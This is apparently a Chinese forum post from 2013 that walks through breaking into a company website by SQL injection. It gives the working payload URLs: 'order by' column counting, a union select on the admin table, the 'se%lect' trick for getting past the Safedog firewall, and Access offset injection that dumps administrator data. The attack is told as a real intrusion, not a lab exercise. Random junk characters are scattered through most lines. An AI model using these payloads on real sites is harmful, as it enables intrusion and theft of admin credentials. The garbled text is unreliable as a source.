打开网站,一个企业站。+ V+ a) h, d- _
9 k; n& G. _/ G8 M
( `- C0 B+ g: Q顺手加个admin
9 k+ [9 R. e& M/ ?; Q7 k. Q% f- P
4 k" Q3 L+ E3 ]; @& O/ U/ b+ n
默认后台。4 [$ C5 ?$ y/ k; c* X: `( H3 a& }
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。; ]" j" h, y$ t
$ Q! H/ v' P/ M7 U: _) _
$ V& ]6 F$ m2 D- J) ]) `: A- \. d5 h
- m8 `1 U7 x9 M( I5 x所以就不用御剑扫了,待会直接封IP。2 M% x& L$ Z& {. [& O" Q$ M+ s8 d
& } i( Z9 |+ M6 U' u3 C
用order by语句判断是否存在注入。, W1 J7 Q% ~( z
http://www.xxx.com /product_show.asp?id=997 order by 1
( ] A7 _/ j# }http://www.xxx.com /product_show.asp?id=997 order by 100
9 k! d; z0 G. u* B1 b2 `6 B6 |现在存在注入,经测试后发现是9个字段。
( d0 X0 r/ L' z7 T6 U- G0 z 8 }6 p0 V7 e* B& F, A5 k
接下来进行联合查询,猜是否存在admin表。
+ p9 L# Q* E0 S, L* Phttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
2 T# M: r$ q, m/ l: \
7 T! Z2 C/ }' d& @- s6 s$ E5 _; l( Y3 D
2 A+ f; R4 n: W- W, {在select中间加个%,se%lect绕过安全狗。& V$ I, ?4 Z8 u% e# m A
5 n- l7 I! H: H R: C
$ E! W2 k: Q6 A4 f( O z' s发现存在admin表,然后开始手工猜常用的字段。: B2 S2 J# E n$ F5 z' g
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
4 O- c6 ~ c7 X* ?( D( z : {" T. a: q ~1 D" n
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
* }* c' Y6 A$ X( i; `" b5 T
7 U/ T, W7 ~* y' g* z0 U科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。 G# {/ X" H8 B% K6 O! n2 V5 z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin9 x" b) ~* |( k& c7 Y* g+ r. D
好了,敏感内容出显了。
1 @. o, x1 P0 J. t+ K! S$ M+ ?, ^) E! G! o; v$ W7 q
, H3 C8 q' S( ~4 Q0 t* J$ G$ e
9 b5 u7 e7 j5 U! s/ x7 S& ?2 W |
发表于 2013-3-8 21:49:45
收藏
支持
反对